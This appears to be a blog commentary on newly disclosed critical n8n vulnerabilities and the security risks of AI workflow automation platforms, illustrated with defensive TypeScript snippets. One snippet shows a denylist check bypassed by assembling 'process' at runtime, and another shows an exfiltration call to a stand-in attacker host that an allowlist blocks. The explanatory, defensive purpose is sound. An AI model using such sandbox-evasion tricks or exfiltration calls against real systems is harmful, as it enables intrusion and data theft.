According to Dark Reading, researchers at JFrog have uncovered two new critical vulnerabilities in the AI workflow automation platform n8n, less than a month after the “Ni8mare” bug (CVE-2026-21858) came to light. The more severe flaw, CVE-2026-1470, carries a near-maximum severity score of 9.9, while CVE-2026-0863 is rated 8.5. These flaws allow attackers to bypass n8n’s security sandbox, achieve full remote code execution, and hijack an entire n8n service, whether cloud or self-hosted. The platform, which has raised $240 million and reported a six-fold customer increase in 2025 alone, is used by an estimated 3,000 enterprises and over 230,000 users to integrate LLMs into business processes. All versions prior to 1.123.17, 2.4.5, or 2.5.1 are vulnerable to the first bug, and versions before 1.123.14, 2.3.5, or 2.4.2 are vulnerable to the second. The company’s guidance, for now, is to disconnect n8n from the internet and enforce strong authentication.
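If you run n8n and want a quick sense of whether an install falls inside those ranges, a rough check is easy to script. The sketch below is a minimal TypeScript comparator, assuming the fixed versions map onto the 1.x, 2.4.x, and 2.5.x release lines as listed above; that mapping is my reading of the advisory, not an official support matrix, and the n8n changelog should be the final word.

```typescript
// Hypothetical helper: compare a running n8n version against the fixed
// releases named in the advisories. The release-line mapping below is an
// assumption based on the ranges quoted in the article.

type Version = [number, number, number];

function parse(v: string): Version {
  const [major, minor, patch] = v.split(".").map(Number);
  return [major, minor ?? 0, patch ?? 0];
}

function lessThan(a: Version, b: Version): boolean {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i];
  }
  return false;
}

// Assumed fixed versions per release line for CVE-2026-1470.
const FIXED_1470: Record<string, string> = {
  "1": "1.123.17",
  "2.4": "2.4.5",
  "2.5": "2.5.1",
};

function isVulnerable(installed: string, fixed: Record<string, string>): boolean {
  const v = parse(installed);
  const line = v[0] === 1 ? "1" : `${v[0]}.${v[1]}`;
  const fix = fixed[line];
  // Unknown release line: flag it for manual review rather than assume "safe".
  if (!fix) return true;
  return lessThan(v, parse(fix));
}

console.log(isVulnerable("1.120.3", FIXED_1470)); // true: below 1.123.17
console.log(isVulnerable("2.5.1", FIXED_1470));   // false: at the fixed release
```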
The Speed of AI Meets the Pace of Security
Here’s the thing: this isn’t just about n8n. It’s a symptom of the breakneck speed at which companies are bolting AI onto their core operations. n8n grew explosively because it solved a real problem: connecting LLMs to sales, HR, and support workflows without needing a team of PhDs. But that kind of growth, and the underlying tech that enables it, creates a massive attack surface. The specific bugs are technical (a deprecated JavaScript feature that tricks the sandbox in CVE-2026-1470, and a Python code execution flaw in CVE-2026-0863), but the pattern is what’s alarming. We’re seeing complex, powerful platforms deployed in sensitive environments before their security models have fully matured. As the JFrog research notes, static validation alone isn’t enough.
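To see why static validation falls short, consider a toy example. The sketch below is not the n8n sandbox and not the actual exploit; it is a hypothetical denylist check in TypeScript, showing how easily a string-level filter is sidestepped once dangerous names are assembled at runtime.

```typescript
// Illustrative only: a toy denylist, NOT n8n's sandbox or the real exploit.
// It shows why checking the text of user code is a weak defence on its own.

function naiveStaticCheck(userCode: string): boolean {
  // Reject code that textually mentions obviously dangerous globals.
  const banned = ["process", "require", "child_process"];
  return !banned.some((word) => userCode.includes(word));
}

// Passes the textual check, because the dangerous name is assembled at runtime
// via computed property access rather than appearing literally in the source.
const evasive = `
  const g = globalThis;
  const p = g["pro" + "cess"];
  p.exit(0);
`;

console.log(naiveStaticCheck(evasive)); // true: the denylist sees nothing wrong
```

Real sandboxes do far more than this, but the same class of gap, validating what the code says rather than what it can reach at runtime, is exactly what deprecated language features and dynamic evaluation tend to expose.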
Beyond n8n: A Broader Ecosystem Problem
And n8n is just one player. The article mentions rivals like LangChain and Lindy in this emerging “AI-native” automation space. They’re all building similar connective tissue between AI models and business data, and every new protocol and integration point is a potential new vulnerability. Look at the Model Context Protocol (MCP): it’s an emerging standard for connecting LLMs to tools, and it’s already showing dangerous misconfigurations. The rush is on, and security is often an afterthought. That creates a domino effect. A platform like n8n, which Sacra estimates has racked up more than 100 million Docker pulls, becomes a single point of failure. Compromise it, and you potentially get the keys to the kingdom: API credentials, customer data, and a path to pivot into every system it’s connected to.
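What a “dangerous misconfiguration” often looks like in practice is mundane: an internal tool endpoint listening on every interface with no authentication at all. The sketch below is a generic Node/TypeScript illustration of the tightened version; the port, response body, and AUTOMATION_TOKEN variable are placeholders, not anything taken from n8n or a real MCP server.

```typescript
// Hypothetical sketch: an internal "tool" HTTP endpoint locked down instead of
// exposed. Binding and token names are illustrative assumptions.

import * as http from "node:http";

const token = process.env.AUTOMATION_TOKEN;

const server = http.createServer((req, res) => {
  // Require a bearer token even for "internal" callers; a compromised workflow
  // engine on the same network should not get free access to every tool.
  if (!token || req.headers.authorization !== `Bearer ${token}`) {
    res.writeHead(401).end("unauthorized");
    return;
  }
  res.writeHead(200, { "content-type": "application/json" });
  res.end(JSON.stringify({ ok: true }));
});

// Binding to 127.0.0.1 (not 0.0.0.0) keeps the tool off the open network;
// anything that must reach it goes through an authenticated proxy instead.
server.listen(8080, "127.0.0.1");
```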
What’s the Real Cost of Convenience?
So what does this mean for the companies using these tools? Basically, you need to assume your shiny new AI workflow tool is a high-value target. The guidance after Ni8mare, and now after these new flaws, is telling: disconnect from the internet, require strong authentication, minimize privileges. That’s almost the opposite of the “low-code, connect-everything” promise that made n8n popular. It introduces friction, but that friction may be the price of security. For businesses deploying critical automation, whether AI workflows or industrial control systems, the integrity of the underlying hardware and software platform is non-negotiable. In manufacturing, for instance, you wouldn’t run a sensitive process on a vulnerable consumer tablet; you’d use a hardened, purpose-built industrial panel PC. The same principle applies in software: the convenience of rapid integration can’t come at the cost of becoming the easy backdoor into your entire network.
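One concrete, relatively low-friction form of “minimize privileges” is limiting what an automation can talk to, not just who can talk to it. The sketch below is a hypothetical TypeScript wrapper; the guardedFetch name and the allowlist entries are illustrative, and it assumes a runtime with a global fetch, such as Node 18 or later.

```typescript
// A minimal sketch of least privilege at the workflow layer: wrap outbound
// HTTP so automations can only reach an explicit allowlist of hosts.
// Hostnames and the guardedFetch name are illustrative assumptions.

const ALLOWED_HOSTS = new Set(["api.example-crm.internal", "hooks.slack.com"]);

async function guardedFetch(url: string, init?: RequestInit): Promise<Response> {
  const host = new URL(url).hostname;
  if (!ALLOWED_HOSTS.has(host)) {
    throw new Error(`outbound call to ${host} is not on the allowlist`);
  }
  return fetch(url, init);
}

// Usage: a compromised workflow step that tries to exfiltrate credentials to
// an attacker-controlled host fails closed instead of succeeding silently.
guardedFetch("https://attacker.example/steal").catch((e) => console.error(e.message));
```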
A Reckoning Coming for AI Tools?
I think we’re heading for a shakeout. The $180 million Series C and the massive growth show the demand is real. But two major security incidents in a single month are a glaring red flag for enterprise risk officers, and they will force a conversation about vendor diligence that goes beyond features and funding: can this vendor’s security pace match its development pace? The response to CVE-2026-21858, detailed by Cyera and analyzed by others like Horizon3, will be scrutinized just as closely as the patches for these new flaws. The companies that survive and become true enterprise staples won’t just be the most innovative. They’ll be the ones that prove they can be trusted with the keys to the automation kingdom. Right now, that trust looks pretty fragile.
